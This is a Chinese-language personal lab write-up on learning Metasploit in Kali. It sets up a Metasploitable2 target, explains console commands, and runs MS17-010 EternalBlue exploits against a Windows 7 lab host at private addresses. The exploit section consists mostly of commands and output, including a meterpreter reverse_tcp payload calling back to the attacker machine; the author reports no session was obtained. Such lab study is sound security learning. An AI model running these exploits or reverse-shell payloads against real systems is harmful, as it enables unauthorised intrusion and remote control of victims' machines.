Kali学习3——MSF

metasploitable2

metasploitable为基于ubuntu的靶机。

下载后直接打开虚拟机即可。

默认账号密码是msfadmin

# 设置root密码
sudo passwd root

# 设置固定IP
vi /etc/network/interfaces
auto eth0
iface eth0 inet static
address xxx.xxx.xxx.xxx
netmask 255.255.255.0
gateway xxx.xxx.xxx.xxx

# 重启网卡
/etc/init.d/networking restart

metasploit framework

msf依赖postgresql数据库,因此需要在kali中先开启

# 启动postgresql
systemctl start postgresql

# 设置开机自启
systemctl enable postgresql

在打开msf console时,也会自动启动postgresql

  • connect命令

    一般用于内网渗透。

    msf6 > connect
    Usage: connect [options]  
    
    Communicate with a host, similar to interacting via netcat, taking advantage of
    any configured session pivoting.
    
    OPTIONS:
    
        -C        Try to use CRLF for EOL sequence.
        -P   Specify source port.
        -S   Specify source address.
        -c   Specify which Comm to use.
        -h        Help banner.
        -i   Send the contents of a file.
        -p   List of proxies to use.
        -s        Connect with SSL.
        -u        Switch to a UDP socket.
        -w   Specify connect timeout.
        -z        Just try to connect, then return.
    
    msf6 > connect xuegod.cn 80
    [*] Connected to xuegod.cn:80 (via: 0.0.0.0:0)
    get /
    HTTP/1.1 400 Bad Request
    Server: nginx/1.6.2
    Date: Thu, 21 Jan 2021 08:05:06 GMT
    Content-Type: text/html
    Content-Length: 172
    Connection: close
    
    
    400 Bad Request
    
    

    400 Bad Request


    nginx/1.6.2
  • show命令

    show options 查看需要的参数

  • search命令

    search name:mysql

    search path:mysql 查询mysql目录下的漏洞

    search platform:mysql 查询影响mysql平台的漏洞

    search cve:CVE-2017-8464

  • use命令

    use 模块的名字

    msf6 > search cve:8464
    
    Matching Modules
    ================
    
       #  Name                                              Disclosure Date  Rank       Check  Description
       -  ----                                              ---------------  ----       -----  -----------
       0  exploit/windows/fileformat/cve_2017_8464_lnk_rce  2017-06-13       excellent  No     LNK Code Execution Vulnerability
       1  exploit/windows/local/cve_2017_8464_lnk_lpe       2017-06-13       excellent  Yes    LNK Code Execution Vulnerability
    
    
    Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/cve_2017_8464_lnk_lpe                                                                             
    
    msf6 > use 0
    msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > 
    
    
  • info命令

    msf6 > search cve:8464
    
    Matching Modules
    ================
    
       #  Name                                              Disclosure Date  Rank       Check  Description
       -  ----                                              ---------------  ----       -----  -----------
       0  exploit/windows/fileformat/cve_2017_8464_lnk_rce  2017-06-13       excellent  No     LNK Code Execution Vulnerability
       1  exploit/windows/local/cve_2017_8464_lnk_lpe       2017-06-13       excellent  Yes    LNK Code Execution Vulnerability
    
    
    Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/local/cve_2017_8464_lnk_lpe                                                                             
    
    msf6 > info 0
    
           Name: LNK Code Execution Vulnerability
         Module: exploit/windows/fileformat/cve_2017_8464_lnk_rce
       Platform: Windows
           Arch: x86, x64
     Privileged: No
        License: Metasploit Framework License (BSD)
           Rank: Excellent
      Disclosed: 2017-06-13
    
    Provided by:
      Uncredited
      Yorick Koster
      Spencer McIntyre
    
    Module stability:
     crash-service-restarts
    
    Available targets:
      Id  Name
      --  ----
      0   Automatic
      1   Windows x64
      2   Windows x86
    
    Check supported:
      No
    
    Basic options:
      Name      Current Setting        Required  Description
      ----      ---------------        --------  -----------
      DLLNAME   FlashPlayerCPLApp.cpl  no        The DLL file containing the payload
      FILENAME  Flash Player.lnk       no        The LNK file
      PATH                             no        An explicit path to where the files will be hosted
    
    Payload information:
      Space: 2048
    
    Description:
      This module exploits a vulnerability in the handling of Windows 
      Shortcut files (.LNK) that contain a dynamic icon, loaded from a 
      malicious DLL. This vulnerability is a variant of MS15-020 
      (CVE-2015-0096). The created LNK file is similar except an 
      additional SpecialFolderDataBlock is included. The folder ID set in 
      this SpecialFolderDataBlock is set to the Control Panel. This is 
      enough to bypass the CPL whitelist. This bypass can be used to trick 
      Windows into loading an arbitrary DLL file. If no PATH is specified, 
      the module will use drive letters D through Z so the files may be 
      placed in the root path of a drive such as a shared VM folder or USB 
      drive.
    
    References:
      https://cvedetails.com/cve/CVE-2017-8464/
      https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464
      http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt
      https://msdn.microsoft.com/en-us/library/dd871305.aspx
      http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm
      https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
    
    

使用永恒之蓝对WIN7进行渗透

msf6 > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/ms17_010_psexec

msf6 > use 1
msf6 auxiliary(scanner/smb/smb_ms17_010) > show option
[-] Invalid parameter "option", use "show -h" for more information
msf6 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST=192.168.197.54
[-] Unknown variable
Usage: set [option] [value]

Set the given option to value.  If value is omitted, print the current value.
If both are omitted, print options that are currently set.

If run from a module context, this will set the value in the module's
datastore.  Use -g to operate on the global datastore.

If setting a PAYLOAD, this command can take an index from `show payloads'.

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOST 192.168.197.54
RHOST => 192.168.197.54
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.197.54:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x86 (32-bit)
[*] 192.168.197.54:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) > back
msf6 > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/ms17_010_psexec

msf6 > use 2
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.197.53   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs


msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOST 192.168.197.54
RHOST => 192.168.197.54
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.197.53:4444 
[*] 192.168.197.54:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.197.54:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Home Basic 7601 Service Pack 1 x86 (32-bit)
[*] 192.168.197.54:445    - Scanned 1 of 1 hosts (100% complete)
[-] 192.168.197.54:445 - Exploit aborted due to failure: no-target: This exploit module only supports x64 (64-bit) targets
[*] Exploit completed, but no session was created.

这里渗透失败了,是因为目标机是32位系统,而MSF内置的漏洞是64位的,需要安装32位的漏洞,这里参考的:https://blog.csdn.net/qq_41617034/article/details/91051614。然后使用32位的漏洞进行渗透:

msf6 exploit(windows/smb/eternalblue_doublepulsar) > run

[*] Started reverse TCP handler on 192.168.197.53:4444 
[*] 192.168.197.54:445 - Generating Eternalblue XML data
[*] 192.168.197.54:445 - Generating Doublepulsar XML data
[*] 192.168.197.54:445 - Generating payload DLL for Doublepulsar
[*] 192.168.197.54:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.197.54:445 - Launching Eternalblue...
[+] 192.168.197.54:445 - Backdoor is already installed
[*] 192.168.197.54:445 - Launching Doublepulsar...
[+] 192.168.197.54:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.

run了几次,但还是失败了,不知道是什么原因。

你可能感兴趣的:(Kali学习3——MSF)